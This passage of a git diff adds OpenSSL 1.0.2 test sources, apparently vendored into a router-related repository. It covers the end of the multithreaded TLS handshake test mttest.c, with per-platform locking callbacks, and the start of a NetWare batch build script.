+        } else if (strcmp(*argv, "-ccert") == 0) {
+            if (--argc < 1)
+                goto bad;
+            ccert = *(++argv);
+        } else if (strcmp(*argv, "-threads") == 0) {
+            if (--argc < 1)
+                goto bad;
+            thread_number = atoi(*(++argv));
+            if (thread_number == 0)
+                thread_number = 1;
+            if (thread_number > MAX_THREAD_NUMBER)
+                thread_number = MAX_THREAD_NUMBER;
+        } else if (strcmp(*argv, "-loops") == 0) {
+            if (--argc < 1)
+                goto bad;
+            number_of_loops = atoi(*(++argv));
+            if (number_of_loops == 0)
+                number_of_loops = 1;
+        } else {
+            fprintf(stderr, "unknown option %s\n", *argv);
+            badop = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+    if (badop) {
+ bad:
+        sv_usage();
+        goto end;
+    }
+
+    if (cipher == NULL && OPENSSL_issetugid() == 0)
+        cipher = getenv("SSL_CIPHER");
+
+    SSL_load_error_strings();
+    OpenSSL_add_ssl_algorithms();
+
+    c_ctx = SSL_CTX_new(ssl_method);
+    s_ctx = SSL_CTX_new(ssl_method);
+    if ((c_ctx == NULL) || (s_ctx == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    SSL_CTX_set_session_cache_mode(s_ctx,
+                                   SSL_SESS_CACHE_NO_AUTO_CLEAR |
+                                   SSL_SESS_CACHE_SERVER);
+    SSL_CTX_set_session_cache_mode(c_ctx,
+                                   SSL_SESS_CACHE_NO_AUTO_CLEAR |
+                                   SSL_SESS_CACHE_SERVER);
+
+    if (!SSL_CTX_use_certificate_file(s_ctx, scert, SSL_FILETYPE_PEM)) {
+        ERR_print_errors(bio_err);
+    } else
+        if (!SSL_CTX_use_RSAPrivateKey_file(s_ctx, scert, SSL_FILETYPE_PEM)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (client_auth) {
+        SSL_CTX_use_certificate_file(c_ctx, ccert, SSL_FILETYPE_PEM);
+        SSL_CTX_use_RSAPrivateKey_file(c_ctx, ccert, SSL_FILETYPE_PEM);
+    }
+
+    if ((!SSL_CTX_load_verify_locations(s_ctx, CAfile, CApath)) ||
+        (!SSL_CTX_set_default_verify_paths(s_ctx)) ||
+        (!SSL_CTX_load_verify_locations(c_ctx, CAfile, CApath)) ||
+        (!SSL_CTX_set_default_verify_paths(c_ctx))) {
+        fprintf(stderr, "SSL_load_verify_locations\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (client_auth) {
+        fprintf(stderr, "client authentication\n");
+        SSL_CTX_set_verify(s_ctx,
+                           SSL_VERIFY_PEER | SSL_VERIFY_FAIL_IF_NO_PEER_CERT,
+                           verify_callback);
+    }
+    if (server_auth) {
+        fprintf(stderr, "server authentication\n");
+        SSL_CTX_set_verify(c_ctx, SSL_VERIFY_PEER, verify_callback);
+    }
+
+    thread_setup();
+    do_threads(s_ctx, c_ctx);
+    thread_cleanup();
+ end:
+
+    if (c_ctx != NULL) {
+        fprintf(stderr, "Client SSL_CTX stats then free it\n");
+        print_stats(stderr, c_ctx);
+        SSL_CTX_free(c_ctx);
+    }
+    if (s_ctx != NULL) {
+        fprintf(stderr, "Server SSL_CTX stats then free it\n");
+        print_stats(stderr, s_ctx);
+        if (cache_stats) {
+            fprintf(stderr, "-----\n");
+            lh_stats(SSL_CTX_sessions(s_ctx), stderr);
+            fprintf(stderr, "-----\n");
+    /*-     lh_node_stats(SSL_CTX_sessions(s_ctx),stderr);
+            fprintf(stderr,"-----\n"); */
+            lh_node_usage_stats(SSL_CTX_sessions(s_ctx), stderr);
+            fprintf(stderr, "-----\n");
+        }
+        SSL_CTX_free(s_ctx);
+        fprintf(stderr, "done free\n");
+    }
+    exit(ret);
+    return (0);
+}
+
+#define W_READ  1
+#define W_WRITE 2
+#define C_DONE  1
+#define S_DONE  2
+
+int ndoit(SSL_CTX *ssl_ctx[2])
+{
+    int i;
+    int ret;
+    char *ctx[4];
+
+    ctx[0] = (char *)ssl_ctx[0];
+    ctx[1] = (char *)ssl_ctx[1];
+
+    if (reconnect) {
+        ctx[2] = (char *)SSL_new(ssl_ctx[0]);
+        ctx[3] = (char *)SSL_new(ssl_ctx[1]);
+    } else {
+        ctx[2] = NULL;
+        ctx[3] = NULL;
+    }
+
+    fprintf(stdout, "started thread %lu\n", CRYPTO_thread_id());
+    for (i = 0; i < number_of_loops; i++) {
+/*-     fprintf(stderr,"%4d %2d ctx->ref (%3d,%3d)\n",
+            CRYPTO_thread_id(),i,
+            ssl_ctx[0]->references,
+            ssl_ctx[1]->references); */
+/*      pthread_delay_np(&tm); */
+
+        ret = doit(ctx);
+        if (ret != 0) {
+            fprintf(stdout, "error[%d] %lu - %d\n",
+                    i, CRYPTO_thread_id(), ret);
+            return (ret);
+        }
+    }
+    fprintf(stdout, "DONE %lu\n", CRYPTO_thread_id());
+    if (reconnect) {
+        SSL_free((SSL *)ctx[2]);
+        SSL_free((SSL *)ctx[3]);
+    }
+#ifdef OPENSSL_SYS_NETWARE
+    MPKSemaphoreSignal(ThreadSem);
+#endif
+    return (0);
+}
+
+int doit(char *ctx[4])
+{
+    SSL_CTX *s_ctx, *c_ctx;
+    static char cbuf[200], sbuf[200];
+    SSL *c_ssl = NULL;
+    SSL *s_ssl = NULL;
+    BIO *c_to_s = NULL;
+    BIO *s_to_c = NULL;
+    BIO *c_bio = NULL;
+    BIO *s_bio = NULL;
+    int c_r, c_w, s_r, s_w;
+    int c_want, s_want;
+    int i;
+    int done = 0;
+    int c_write, s_write;
+    int do_server = 0, do_client = 0;
+
+    s_ctx = (SSL_CTX *)ctx[0];
+    c_ctx = (SSL_CTX *)ctx[1];
+
+    if (ctx[2] != NULL)
+        s_ssl = (SSL *)ctx[2];
+    else
+        s_ssl = SSL_new(s_ctx);
+
+    if (ctx[3] != NULL)
+        c_ssl = (SSL *)ctx[3];
+    else
+        c_ssl = SSL_new(c_ctx);
+
+    if ((s_ssl == NULL) || (c_ssl == NULL))
+        goto err;
+
+    c_to_s = BIO_new(BIO_s_mem());
+    s_to_c = BIO_new(BIO_s_mem());
+    if ((s_to_c == NULL) || (c_to_s == NULL))
+        goto err;
+
+    c_bio = BIO_new(BIO_f_ssl());
+    s_bio = BIO_new(BIO_f_ssl());
+    if ((c_bio == NULL) || (s_bio == NULL))
+        goto err;
+
+    SSL_set_connect_state(c_ssl);
+    SSL_set_bio(c_ssl, s_to_c, c_to_s);
+    BIO_set_ssl(c_bio, c_ssl, (ctx[2] == NULL) ? BIO_CLOSE : BIO_NOCLOSE);
+
+    SSL_set_accept_state(s_ssl);
+    SSL_set_bio(s_ssl, c_to_s, s_to_c);
+    BIO_set_ssl(s_bio, s_ssl, (ctx[3] == NULL) ? BIO_CLOSE : BIO_NOCLOSE);
+
+    c_r = 0;
+    s_r = 1;
+    c_w = 1;
+    s_w = 0;
+    c_want = W_WRITE;
+    s_want = 0;
+    c_write = 1, s_write = 0;
+
+    /* We can always do writes */
+    for (;;) {
+        do_server = 0;
+        do_client = 0;
+
+        i = (int)BIO_pending(s_bio);
+        if ((i && s_r) || s_w)
+            do_server = 1;
+
+        i = (int)BIO_pending(c_bio);
+        if ((i && c_r) || c_w)
+            do_client = 1;
+
+        if (do_server && verbose) {
+            if (SSL_in_init(s_ssl))
+                printf("server waiting in SSL_accept - %s\n",
+                       SSL_state_string_long(s_ssl));
+            else if (s_write)
+                printf("server:SSL_write()\n");
+            else
+                printf("server:SSL_read()\n");
+        }
+
+        if (do_client && verbose) {
+            if (SSL_in_init(c_ssl))
+                printf("client waiting in SSL_connect - %s\n",
+                       SSL_state_string_long(c_ssl));
+            else if (c_write)
+                printf("client:SSL_write()\n");
+            else
+                printf("client:SSL_read()\n");
+        }
+
+        if (!do_client && !do_server) {
+            fprintf(stdout, "ERROR IN STARTUP\n");
+            break;
+        }
+        if (do_client && !(done & C_DONE)) {
+            if (c_write) {
+                i = BIO_write(c_bio, "hello from client\n", 18);
+                if (i < 0) {
+                    c_r = 0;
+                    c_w = 0;
+                    if (BIO_should_retry(c_bio)) {
+                        if (BIO_should_read(c_bio))
+                            c_r = 1;
+                        if (BIO_should_write(c_bio))
+                            c_w = 1;
+                    } else {
+                        fprintf(stderr, "ERROR in CLIENT\n");
+                        ERR_print_errors_fp(stderr);
+                        return (1);
+                    }
+                } else if (i == 0) {
+                    fprintf(stderr, "SSL CLIENT STARTUP FAILED\n");
+                    return (1);
+                } else {
+                    /* ok */
+                    c_write = 0;
+                }
+            } else {
+                i = BIO_read(c_bio, cbuf, 100);
+                if (i < 0) {
+                    c_r = 0;
+                    c_w = 0;
+                    if (BIO_should_retry(c_bio)) {
+                        if (BIO_should_read(c_bio))
+                            c_r = 1;
+                        if (BIO_should_write(c_bio))
+                            c_w = 1;
+                    } else {
+                        fprintf(stderr, "ERROR in CLIENT\n");
+                        ERR_print_errors_fp(stderr);
+                        return (1);
+                    }
+                } else if (i == 0) {
+                    fprintf(stderr, "SSL CLIENT STARTUP FAILED\n");
+                    return (1);
+                } else {
+                    done |= C_DONE;
+#ifdef undef
+                    fprintf(stdout, "CLIENT:from server:");
+                    fwrite(cbuf, 1, i, stdout);
+                    fflush(stdout);
+#endif
+                }
+            }
+        }
+
+        if (do_server && !(done & S_DONE)) {
+            if (!s_write) {
+                i = BIO_read(s_bio, sbuf, 100);
+                if (i < 0) {
+                    s_r = 0;
+                    s_w = 0;
+                    if (BIO_should_retry(s_bio)) {
+                        if (BIO_should_read(s_bio))
+                            s_r = 1;
+                        if (BIO_should_write(s_bio))
+                            s_w = 1;
+                    } else {
+                        fprintf(stderr, "ERROR in SERVER\n");
+                        ERR_print_errors_fp(stderr);
+                        return (1);
+                    }
+                } else if (i == 0) {
+                    fprintf(stderr, "SSL SERVER STARTUP FAILED\n");
+                    return (1);
+                } else {
+                    s_write = 1;
+                    s_w = 1;
+#ifdef undef
+                    fprintf(stdout, "SERVER:from client:");
+                    fwrite(sbuf, 1, i, stdout);
+                    fflush(stdout);
+#endif
+                }
+            } else {
+                i = BIO_write(s_bio, "hello from server\n", 18);
+                if (i < 0) {
+                    s_r = 0;
+                    s_w = 0;
+                    if (BIO_should_retry(s_bio)) {
+                        if (BIO_should_read(s_bio))
+                            s_r = 1;
+                        if (BIO_should_write(s_bio))
+                            s_w = 1;
+                    } else {
+                        fprintf(stderr, "ERROR in SERVER\n");
+                        ERR_print_errors_fp(stderr);
+                        return (1);
+                    }
+                } else if (i == 0) {
+                    fprintf(stderr, "SSL SERVER STARTUP FAILED\n");
+                    return (1);
+                } else {
+                    s_write = 0;
+                    s_r = 1;
+                    done |= S_DONE;
+                }
+            }
+        }
+
+        if ((done & S_DONE) && (done & C_DONE))
+            break;
+#if defined(OPENSSL_SYS_NETWARE)
+        ThreadSwitchWithDelay();
+#endif
+    }
+
+    SSL_set_shutdown(c_ssl, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
+    SSL_set_shutdown(s_ssl, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
+
+#ifdef undef
+    fprintf(stdout, "DONE\n");
+#endif
+ err:
+    /*
+     * We have to set the BIO's to NULL otherwise they will be free()ed
+     * twice.  Once when th s_ssl is SSL_free()ed and again when c_ssl is
+     * SSL_free()ed. This is a hack required because s_ssl and c_ssl are
+     * sharing the same BIO structure and SSL_set_bio() and SSL_free()
+     * automatically BIO_free non NULL entries. You should not normally do
+     * this or be required to do this
+     */
+
+    if (s_ssl != NULL) {
+        s_ssl->rbio = NULL;
+        s_ssl->wbio = NULL;
+    }
+    if (c_ssl != NULL) {
+        c_ssl->rbio = NULL;
+        c_ssl->wbio = NULL;
+    }
+
+    /* The SSL's are optionally freed in the following calls */
+    if (c_to_s != NULL)
+        BIO_free(c_to_s);
+    if (s_to_c != NULL)
+        BIO_free(s_to_c);
+
+    if (c_bio != NULL)
+        BIO_free(c_bio);
+    if (s_bio != NULL)
+        BIO_free(s_bio);
+    return (0);
+}
+
+int MS_CALLBACK verify_callback(int ok, X509_STORE_CTX *ctx)
+{
+    char *s, buf[256];
+
+    if (verbose) {
+        s = X509_NAME_oneline(X509_get_subject_name(ctx->current_cert),
+                              buf, 256);
+        if (s != NULL) {
+            if (ok)
+                fprintf(stderr, "depth=%d %s\n", ctx->error_depth, buf);
+            else
+                fprintf(stderr, "depth=%d error=%d %s\n",
+                        ctx->error_depth, ctx->error, buf);
+        }
+    }
+    return (ok);
+}
+
+#define THREAD_STACK_SIZE (16*1024)
+
+#ifdef OPENSSL_SYS_WIN32
+
+static HANDLE *lock_cs;
+
+void thread_setup(void)
+{
+    int i;
+
+    lock_cs = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(HANDLE));
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        lock_cs[i] = CreateMutex(NULL, FALSE, NULL);
+    }
+
+    CRYPTO_set_locking_callback((void (*)(int, int, char *, int))
+                                win32_locking_callback);
+    /* id callback defined */
+}
+
+void thread_cleanup(void)
+{
+    int i;
+
+    CRYPTO_set_locking_callback(NULL);
+    for (i = 0; i < CRYPTO_num_locks(); i++)
+        CloseHandle(lock_cs[i]);
+    OPENSSL_free(lock_cs);
+}
+
+void win32_locking_callback(int mode, int type, char *file, int line)
+{
+    if (mode & CRYPTO_LOCK) {
+        WaitForSingleObject(lock_cs[type], INFINITE);
+    } else {
+        ReleaseMutex(lock_cs[type]);
+    }
+}
+
+void do_threads(SSL_CTX *s_ctx, SSL_CTX *c_ctx)
+{
+    double ret;
+    SSL_CTX *ssl_ctx[2];
+    DWORD thread_id[MAX_THREAD_NUMBER];
+    HANDLE thread_handle[MAX_THREAD_NUMBER];
+    int i;
+    SYSTEMTIME start, end;
+
+    ssl_ctx[0] = s_ctx;
+    ssl_ctx[1] = c_ctx;
+
+    GetSystemTime(&start);
+    for (i = 0; i < thread_number; i++) {
+        thread_handle[i] = CreateThread(NULL,
+                                        THREAD_STACK_SIZE,
+                                        (LPTHREAD_START_ROUTINE) ndoit,
+                                        (void *)ssl_ctx, 0L, &(thread_id[i]));
+    }
+
+    printf("reaping\n");
+    for (i = 0; i < thread_number; i += 50) {
+        int j;
+
+        j = (thread_number < (i + 50)) ? (thread_number - i) : 50;
+
+        if (WaitForMultipleObjects(j,
+                                   (CONST HANDLE *) & (thread_handle[i]),
+                                   TRUE, INFINITE)
+            == WAIT_FAILED) {
+            fprintf(stderr, "WaitForMultipleObjects failed:%d\n",
+                    GetLastError());
+            exit(1);
+        }
+    }
+    GetSystemTime(&end);
+
+    if (start.wDayOfWeek > end.wDayOfWeek)
+        end.wDayOfWeek += 7;
+    ret = (end.wDayOfWeek - start.wDayOfWeek) * 24;
+
+    ret = (ret + end.wHour - start.wHour) * 60;
+    ret = (ret + end.wMinute - start.wMinute) * 60;
+    ret = (ret + end.wSecond - start.wSecond);
+    ret += (end.wMilliseconds - start.wMilliseconds) / 1000.0;
+
+    printf("win32 threads done - %.3f seconds\n", ret);
+}
+
+#endif                          /* OPENSSL_SYS_WIN32 */
+
+#ifdef SOLARIS
+
+static mutex_t *lock_cs;
+/*
+ * static rwlock_t *lock_cs;
+ */
+static long *lock_count;
+
+void thread_setup(void)
+{
+    int i;
+
+    lock_cs = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(mutex_t));
+    lock_count = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(long));
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        lock_count[i] = 0;
+        /* rwlock_init(&(lock_cs[i]),USYNC_THREAD,NULL); */
+        mutex_init(&(lock_cs[i]), USYNC_THREAD, NULL);
+    }
+
+    CRYPTO_set_id_callback((unsigned long (*)())solaris_thread_id);
+    CRYPTO_set_locking_callback((void (*)())solaris_locking_callback);
+}
+
+void thread_cleanup(void)
+{
+    int i;
+
+    CRYPTO_set_locking_callback(NULL);
+
+    fprintf(stderr, "cleanup\n");
+
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        /* rwlock_destroy(&(lock_cs[i])); */
+        mutex_destroy(&(lock_cs[i]));
+        fprintf(stderr, "%8ld:%s\n", lock_count[i], CRYPTO_get_lock_name(i));
+    }
+    OPENSSL_free(lock_cs);
+    OPENSSL_free(lock_count);
+
+    fprintf(stderr, "done cleanup\n");
+
+}
+
+void solaris_locking_callback(int mode, int type, char *file, int line)
+{
+# ifdef undef
+    fprintf(stderr, "thread=%4d mode=%s lock=%s %s:%d\n",
+            CRYPTO_thread_id(),
+            (mode & CRYPTO_LOCK) ? "l" : "u",
+            (type & CRYPTO_READ) ? "r" : "w", file, line);
+# endif
+
+    /*-
+    if (CRYPTO_LOCK_SSL_CERT == type)
+    fprintf(stderr,"(t,m,f,l) %ld %d %s %d\n",
+            CRYPTO_thread_id(),
+            mode,file,line);
+    */
+    if (mode & CRYPTO_LOCK) {
+        /*-
+        if (mode & CRYPTO_READ)
+                rw_rdlock(&(lock_cs[type]));
+        else
+                rw_wrlock(&(lock_cs[type])); */
+
+        mutex_lock(&(lock_cs[type]));
+        lock_count[type]++;
+    } else {
+/*      rw_unlock(&(lock_cs[type]));  */
+        mutex_unlock(&(lock_cs[type]));
+    }
+}
+
+void do_threads(SSL_CTX *s_ctx, SSL_CTX *c_ctx)
+{
+    SSL_CTX *ssl_ctx[2];
+    thread_t thread_ctx[MAX_THREAD_NUMBER];
+    int i;
+
+    ssl_ctx[0] = s_ctx;
+    ssl_ctx[1] = c_ctx;
+
+    thr_setconcurrency(thread_number);
+    for (i = 0; i < thread_number; i++) {
+        thr_create(NULL, THREAD_STACK_SIZE,
+                   (void *(*)())ndoit, (void *)ssl_ctx, 0L, &(thread_ctx[i]));
+    }
+
+    printf("reaping\n");
+    for (i = 0; i < thread_number; i++) {
+        thr_join(thread_ctx[i], NULL, NULL);
+    }
+
+    printf("solaris threads done (%d,%d)\n",
+           s_ctx->references, c_ctx->references);
+}
+
+unsigned long solaris_thread_id(void)
+{
+    unsigned long ret;
+
+    ret = (unsigned long)thr_self();
+    return (ret);
+}
+#endif                          /* SOLARIS */
+
+#ifdef IRIX
+
+static usptr_t *arena;
+static usema_t **lock_cs;
+
+void thread_setup(void)
+{
+    int i;
+    char filename[20];
+
+    strcpy(filename, "/tmp/mttest.XXXXXX");
+    mktemp(filename);
+
+    usconfig(CONF_STHREADIOOFF);
+    usconfig(CONF_STHREADMALLOCOFF);
+    usconfig(CONF_INITUSERS, 100);
+    usconfig(CONF_LOCKTYPE, US_DEBUGPLUS);
+    arena = usinit(filename);
+    unlink(filename);
+
+    lock_cs = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(usema_t *));
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        lock_cs[i] = usnewsema(arena, 1);
+    }
+
+    CRYPTO_set_id_callback((unsigned long (*)())irix_thread_id);
+    CRYPTO_set_locking_callback((void (*)())irix_locking_callback);
+}
+
+void thread_cleanup(void)
+{
+    int i;
+
+    CRYPTO_set_locking_callback(NULL);
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        char buf[10];
+
+        sprintf(buf, "%2d:", i);
+        usdumpsema(lock_cs[i], stdout, buf);
+        usfreesema(lock_cs[i], arena);
+    }
+    OPENSSL_free(lock_cs);
+}
+
+void irix_locking_callback(int mode, int type, char *file, int line)
+{
+    if (mode & CRYPTO_LOCK) {
+        printf("lock %d\n", type);
+        uspsema(lock_cs[type]);
+    } else {
+        printf("unlock %d\n", type);
+        usvsema(lock_cs[type]);
+    }
+}
+
+void do_threads(SSL_CTX *s_ctx, SSL_CTX *c_ctx)
+{
+    SSL_CTX *ssl_ctx[2];
+    int thread_ctx[MAX_THREAD_NUMBER];
+    int i;
+
+    ssl_ctx[0] = s_ctx;
+    ssl_ctx[1] = c_ctx;
+
+    for (i = 0; i < thread_number; i++) {
+        thread_ctx[i] = sproc((void (*)())ndoit,
+                              PR_SADDR | PR_SFDS, (void *)ssl_ctx);
+    }
+
+    printf("reaping\n");
+    for (i = 0; i < thread_number; i++) {
+        wait(NULL);
+    }
+
+    printf("irix threads done (%d,%d)\n",
+           s_ctx->references, c_ctx->references);
+}
+
+unsigned long irix_thread_id(void)
+{
+    unsigned long ret;
+
+    ret = (unsigned long)getpid();
+    return (ret);
+}
+#endif                          /* IRIX */
+
+#ifdef PTHREADS
+
+static pthread_mutex_t *lock_cs;
+static long *lock_count;
+
+void thread_setup(void)
+{
+    int i;
+
+    lock_cs = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(pthread_mutex_t));
+    lock_count = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(long));
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        lock_count[i] = 0;
+        pthread_mutex_init(&(lock_cs[i]), NULL);
+    }
+
+    CRYPTO_set_id_callback((unsigned long (*)())pthreads_thread_id);
+    CRYPTO_set_locking_callback((void (*)())pthreads_locking_callback);
+}
+
+void thread_cleanup(void)
+{
+    int i;
+
+    CRYPTO_set_locking_callback(NULL);
+    fprintf(stderr, "cleanup\n");
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        pthread_mutex_destroy(&(lock_cs[i]));
+        fprintf(stderr, "%8ld:%s\n", lock_count[i], CRYPTO_get_lock_name(i));
+    }
+    OPENSSL_free(lock_cs);
+    OPENSSL_free(lock_count);
+
+    fprintf(stderr, "done cleanup\n");
+}
+
+void pthreads_locking_callback(int mode, int type, char *file, int line)
+{
+# ifdef undef
+    fprintf(stderr, "thread=%4d mode=%s lock=%s %s:%d\n",
+            CRYPTO_thread_id(),
+            (mode & CRYPTO_LOCK) ? "l" : "u",
+            (type & CRYPTO_READ) ? "r" : "w", file, line);
+# endif
+/*-
+    if (CRYPTO_LOCK_SSL_CERT == type)
+            fprintf(stderr,"(t,m,f,l) %ld %d %s %d\n",
+            CRYPTO_thread_id(),
+            mode,file,line);
+*/
+    if (mode & CRYPTO_LOCK) {
+        pthread_mutex_lock(&(lock_cs[type]));
+        lock_count[type]++;
+    } else {
+        pthread_mutex_unlock(&(lock_cs[type]));
+    }
+}
+
+void do_threads(SSL_CTX *s_ctx, SSL_CTX *c_ctx)
+{
+    SSL_CTX *ssl_ctx[2];
+    pthread_t thread_ctx[MAX_THREAD_NUMBER];
+    int i;
+
+    ssl_ctx[0] = s_ctx;
+    ssl_ctx[1] = c_ctx;
+
+    /*
+     * thr_setconcurrency(thread_number);
+     */
+    for (i = 0; i < thread_number; i++) {
+        pthread_create(&(thread_ctx[i]), NULL,
+                       (void *(*)())ndoit, (void *)ssl_ctx);
+    }
+
+    printf("reaping\n");
+    for (i = 0; i < thread_number; i++) {
+        pthread_join(thread_ctx[i], NULL);
+    }
+
+    printf("pthreads threads done (%d,%d)\n",
+           s_ctx->references, c_ctx->references);
+}
+
+unsigned long pthreads_thread_id(void)
+{
+    unsigned long ret;
+
+    ret = (unsigned long)pthread_self();
+    return (ret);
+}
+
+#endif                          /* PTHREADS */
+
+#ifdef OPENSSL_SYS_NETWARE
+
+void thread_setup(void)
+{
+    int i;
+
+    lock_cs = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(MPKMutex));
+    lock_count = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(long));
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        lock_count[i] = 0;
+        lock_cs[i] = MPKMutexAlloc("OpenSSL mutex");
+    }
+
+    ThreadSem = MPKSemaphoreAlloc("OpenSSL mttest semaphore", 0);
+
+    CRYPTO_set_id_callback((unsigned long (*)())netware_thread_id);
+    CRYPTO_set_locking_callback((void (*)())netware_locking_callback);
+}
+
+void thread_cleanup(void)
+{
+    int i;
+
+    CRYPTO_set_locking_callback(NULL);
+
+    fprintf(stdout, "thread_cleanup\n");
+
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        MPKMutexFree(lock_cs[i]);
+        fprintf(stdout, "%8ld:%s\n", lock_count[i], CRYPTO_get_lock_name(i));
+    }
+    OPENSSL_free(lock_cs);
+    OPENSSL_free(lock_count);
+
+    MPKSemaphoreFree(ThreadSem);
+
+    fprintf(stdout, "done cleanup\n");
+}
+
+void netware_locking_callback(int mode, int type, char *file, int line)
+{
+    if (mode & CRYPTO_LOCK) {
+        MPKMutexLock(lock_cs[type]);
+        lock_count[type]++;
+    } else
+        MPKMutexUnlock(lock_cs[type]);
+}
+
+void do_threads(SSL_CTX *s_ctx, SSL_CTX *c_ctx)
+{
+    SSL_CTX *ssl_ctx[2];
+    int i;
+    ssl_ctx[0] = s_ctx;
+    ssl_ctx[1] = c_ctx;
+
+    for (i = 0; i < thread_number; i++) {
+        BeginThread((void (*)(void *))ndoit, NULL, THREAD_STACK_SIZE,
+                    (void *)ssl_ctx);
+        ThreadSwitchWithDelay();
+    }
+
+    printf("reaping\n");
+
+    /* loop until all threads have signaled the semaphore */
+    for (i = 0; i < thread_number; i++) {
+        MPKSemaphoreWait(ThreadSem);
+    }
+    printf("netware threads done (%d,%d)\n",
+           s_ctx->references, c_ctx->references);
+}
+
+unsigned long netware_thread_id(void)
+{
+    unsigned long ret;
+
+    ret = (unsigned long)GetThreadID();
+    return (ret);
+}
+#endif                          /* NETWARE */
+
+#ifdef BEOS_THREADS
+
+# include <Locker.h>
+
+static BLocker **lock_cs;
+static long *lock_count;
+
+void thread_setup(void)
+{
+    int i;
+
+    lock_cs =
+        (BLocker **) OPENSSL_malloc(CRYPTO_num_locks() * sizeof(BLocker *));
+    lock_count = (long *)OPENSSL_malloc(CRYPTO_num_locks() * sizeof(long));
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        lock_count[i] = 0;
+        lock_cs[i] = new BLocker(CRYPTO_get_lock_name(i));
+    }
+
+    CRYPTO_set_id_callback((unsigned long (*)())beos_thread_id);
+    CRYPTO_set_locking_callback(beos_locking_callback);
+}
+
+void thread_cleanup(void)
+{
+    int i;
+
+    CRYPTO_set_locking_callback(NULL);
+    fprintf(stderr, "cleanup\n");
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        delete lock_cs[i];
+        fprintf(stderr, "%8ld:%s\n", lock_count[i], CRYPTO_get_lock_name(i));
+    }
+    OPENSSL_free(lock_cs);
+    OPENSSL_free(lock_count);
+
+    fprintf(stderr, "done cleanup\n");
+}
+
+void beos_locking_callback(int mode, int type, const char *file, int line)
+{
+# if 0
+    fprintf(stderr, "thread=%4d mode=%s lock=%s %s:%d\n",
+            CRYPTO_thread_id(),
+            (mode & CRYPTO_LOCK) ? "l" : "u",
+            (type & CRYPTO_READ) ? "r" : "w", file, line);
+# endif
+    if (mode & CRYPTO_LOCK) {
+        lock_cs[type]->Lock();
+        lock_count[type]++;
+    } else {
+        lock_cs[type]->Unlock();
+    }
+}
+
+void do_threads(SSL_CTX *s_ctx, SSL_CTX *c_ctx)
+{
+    SSL_CTX *ssl_ctx[2];
+    thread_id thread_ctx[MAX_THREAD_NUMBER];
+    int i;
+
+    ssl_ctx[0] = s_ctx;
+    ssl_ctx[1] = c_ctx;
+
+    for (i = 0; i < thread_number; i++) {
+        thread_ctx[i] = spawn_thread((thread_func) ndoit,
+                                     NULL, B_NORMAL_PRIORITY,
+                                     (void *)ssl_ctx);
+        resume_thread(thread_ctx[i]);
+    }
+
+    printf("waiting...\n");
+    for (i = 0; i < thread_number; i++) {
+        status_t result;
+        wait_for_thread(thread_ctx[i], &result);
+    }
+
+    printf("beos threads done (%d,%d)\n",
+           s_ctx->references, c_ctx->references);
+}
+
+unsigned long beos_thread_id(void)
+{
+    unsigned long ret;
+
+    ret = (unsigned long)find_thread(NULL);
+    return (ret);
+}
+
+#endif                          /* BEOS_THREADS */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/netware.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/netware.bat
new file mode 100644
index 0000000..0b3eca3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/netware.bat
@@ -0,0 +1,79 @@
+@echo off
+rem batch file to build multi-thread test ( mttest.nlm )
+
+rem command line arguments:
+rem      debug => build using debug settings
+
+rem
+rem After building, copy mttest.nlm to the server and run it, you'll probably
+rem want to redirect stdout and stderr.  An example command line would be
+rem "mttest.nlm -thread 20 -loops 10 -CAfile \openssl\apps\server.pem >mttest.out 2>mttest.err"
+rem 
+
+del mttest.nlm
+
+set BLD_DEBUG=
+set CFLAGS=
+set LFLAGS=
+set LIBS=
+
+if "%1" == "DEBUG" set BLD_DEBUG=YES
+if "%1" == "debug" set BLD_DEBUG=YES
+
+if "%MWCIncludes%" == "" goto inc_error
+if "%PRELUDE%" == "" goto prelude_error
+if "%IMPORTS%" == "" goto imports_error
+
+set CFLAGS=-c -I..\..\outinc_nw -nosyspath -DOPENSSL_SYS_NETWARE -opt off -g -sym internal -maxerrors 20
+
+if "%BLD_DEBUG%" == "YES" set LIBS=..\..\out_nw.dbg\ssl.lib ..\..\out_nw.dbg\crypto.lib
+if "%BLD_DEBUG%" == ""  set LIBS=..\..\out_nw\ssl.lib ..\..\out_nw\crypto.lib
+
+set LFLAGS=-msgstyle gcc -zerobss -stacksize 32768 -nostdlib -sym internal 
+  
+rem generate command file for metrowerks
+echo.
+echo Generating Metrowerks command file: mttest.def
+echo # dynamically generated command file for metrowerks build > mttest.def
+echo IMPORT @%IMPORTS%\clib.imp              >> mttest.def 
+echo IMPORT @%IMPORTS%\threads.imp           >> mttest.def 
+echo IMPORT @%IMPORTS%\ws2nlm.imp            >> mttest.def 
+echo IMPORT GetProcessSwitchCount            >> mttest.def
+echo MODULE clib                             >> mttest.def 
+
+rem compile
+echo.
+echo Compiling mttest.c
+mwccnlm.exe mttest.c %CFLAGS% 
+if errorlevel 1 goto end
+
+rem link               
+echo.
+echo Linking mttest.nlm
